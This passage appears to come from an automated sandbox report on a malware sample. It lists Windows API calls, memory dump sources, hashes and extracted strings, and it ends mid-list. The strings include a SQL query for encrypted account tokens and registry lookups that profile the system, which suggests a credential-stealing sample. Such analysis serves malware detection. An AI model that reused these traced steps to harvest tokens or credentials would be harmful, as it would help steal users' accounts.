                                    • lstrlen.KERNEL32(00000000), ref: 0018BBF7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpylstrlen$AllocLocallstrcat
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3171688271-1079375795
                                    • Opcode ID: 6e5d73e00e985aae5b61261e1f0b2309b7e1dc74cd1599d52462dec19b88ae56
                                    • Instruction ID: 930699cc9dd3ad854b29da25107b7ded0c80acaa1b20fef582cb12025a456342
                                    • Opcode Fuzzy Hash: 6e5d73e00e985aae5b61261e1f0b2309b7e1dc74cd1599d52462dec19b88ae56
                                    • Instruction Fuzzy Hash: 6AA1EA72910108AACF15FBA4DC96EEE7778BF65300F844569F506620A1EF746B4CCBE2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013ADBC8,00000000,?,001A0DFC,00000000,?,00000000), ref: 00197BD0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00197BD7
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00197BF8
                                    • wsprintfA.USER32 ref: 00197C4C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2922868504-3474575989
                                    • Opcode ID: 2476004de7bce0eb3c09f2372238fa04169d7a7313a395be1d9c6000f3a87cce
                                    • Instruction ID: b04b7ef606d20c9880270b91d908577ab63f6033797de79a3f6fcd2f735a8173
                                    • Opcode Fuzzy Hash: 2476004de7bce0eb3c09f2372238fa04169d7a7313a395be1d9c6000f3a87cce
                                    • Instruction Fuzzy Hash: CC2108B1E44209ABEB00DFD8DD49FAEB778FB49B14F104509F605BB680D77899008BA5
                                    APIs
                                    • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00197EC6
                                    • wsprintfA.USER32 ref: 00197EF9
                                    • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00197F1B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00197F2C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00197F39
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                    • RegQueryValueExA.KERNEL32(00000000,013ADD90,00000000,000F003F,?,00000400), ref: 00197F8C
                                    • lstrlen.KERNEL32(?), ref: 00197FA1
                                    • RegQueryValueExA.KERNEL32(00000000,013ADDD8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,001A0B24), ref: 00198039
                                    • RegCloseKey.KERNEL32(00000000), ref: 001980A8
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001980BA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: 1e03bd627c799612a4dffd624f39b4428ac99a34acfc58dd01ef2f44bb28548f
                                    • Instruction ID: 8efe35e717f53b954c58c69799284da151e7be12d26992a64aab3a3105eea2ac
                                    • Opcode Fuzzy Hash: 1e03bd627c799612a4dffd624f39b4428ac99a34acfc58dd01ef2f44bb28548f
                                    • Instruction Fuzzy Hash: C621E975A1021CABDB24DB54DC85FD9B7B9FB48704F00C1A8A609A6180DF71AA85CFE4
                                    APIs
                                    • ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0018483B
                                    • ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184852
                                    • ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184869
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 19054d42c78a7110f6f76f8bff2c22d52cf71386cdcc68fad1b717d353cb7c7e
                                    • Instruction ID: dbb2c7c3f2d160d52de9e7761187b2060ba9cf67631142fe70eabf3a09b8d2cb
                                    • Opcode Fuzzy Hash: 19054d42c78a7110f6f76f8bff2c22d52cf71386cdcc68fad1b717d353cb7c7e
                                    • Instruction Fuzzy Hash: FD214CB1D00209ABDF14DFA4EC49ADE7B79FF45320F508625F915A7290EB706A09CB81
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197144
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0019714B
                                    • RegOpenKeyExA.KERNEL32(80000002,0139BB60,00000000,00020119,00000000), ref: 0019717D
                                    • RegQueryValueExA.KERNEL32(00000000,013ADD60,00000000,00000000,?,000000FF), ref: 0019719E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001971A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 80676e02bbf4f58a3f1cd875ce15648d24d02a698aed68cf73ff48f280b6c544
                                    • Instruction ID: 41a24382f95d528201f1a4f36d3d5fd1790f7e1800b1cf3b0f41d36e711af6d5
                                    • Opcode Fuzzy Hash: 80676e02bbf4f58a3f1cd875ce15648d24d02a698aed68cf73ff48f280b6c544
                                    • Instruction Fuzzy Hash: 3C016275A14208BFEB04DBE4DD49FAEB7BCEF09700F104054FA0997280DB709A04CB50
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001971D4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001971DB
                                    • RegOpenKeyExA.KERNEL32(80000002,0139BB60,00000000,00020119,00197159), ref: 001971FB
                                    • RegQueryValueExA.KERNEL32(00197159,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0019721A
                                    • RegCloseKey.ADVAPI32(00197159), ref: 00197224
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: ff984a35db46d69e4d015c6b198a7da0c5e73bfcbcd085759249e1eba311deec
                                    • Instruction ID: 82c7261b069df6d29654bbdfa14a585cb7d6f5e580f967893f4014617b5fff52
                                    • Opcode Fuzzy Hash: ff984a35db46d69e4d015c6b198a7da0c5e73bfcbcd085759249e1eba311deec
                                    • Instruction Fuzzy Hash: E301FFB9A50308BFDB11DBE4DC4AFAEB77CEB09700F104558FA05A7281DB71AA048B51
                                    APIs
                                    • memset.MSVCRT ref: 00193BE5
                                    • RegOpenKeyExA.KERNEL32(80000001,013AD478,00000000,00020119,?), ref: 00193C04
                                    • RegQueryValueExA.ADVAPI32(?,013ADEB0,00000000,00000000,00000000,000000FF), ref: 00193C28
                                    • RegCloseKey.ADVAPI32(?), ref: 00193C32
                                    • lstrcat.KERNEL32(?,00000000), ref: 00193C57
                                    • lstrcat.KERNEL32(?,013ADE68), ref: 00193C6B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                    • String ID:
                                    • API String ID: 2623679115-0
                                    • Opcode ID: 6b386c9d5b098eb0cc5fd8940bc3107e973fc29771b1dc43ab1c790c9081189d
                                    • Instruction ID: 22a5801caddd621b672aceaa2320da812a8e57cd6d2046224e6c7f72966e8ac1
                                    • Opcode Fuzzy Hash: 6b386c9d5b098eb0cc5fd8940bc3107e973fc29771b1dc43ab1c790c9081189d
                                    • Instruction Fuzzy Hash: F641A7B69101086BDB19FBA0EC46FEE733DAB9A300F40495CB61A57181EFB5578C8BD1
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00189A3C
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00189A61
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00189A81
                                    • ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 00189AAA
                                    • LocalFree.KERNEL32(0018148F), ref: 00189AE0
                                    • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00189AEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
                                    • String ID:
                                    • API String ID: 1815715184-0
                                    • Opcode ID: a59b0a8d1c3104fd5da2d0167d45d2381f3601891d009b3e81fb330da5c4b481
                                    • Instruction ID: 055328b7daa55e9c6e37d82d29b17a04b24a275a9476dae52d653465391df18e
                                    • Opcode Fuzzy Hash: a59b0a8d1c3104fd5da2d0167d45d2381f3601891d009b3e81fb330da5c4b481
                                    • Instruction Fuzzy Hash: 9B31FC74A00209EFDB18DF94C885BAE7BB9FF49304F148158F911AB290D774AA41CFA1
                                    APIs
                                    • lstrcat.KERNEL32(?,013ADF40), ref: 001942BB
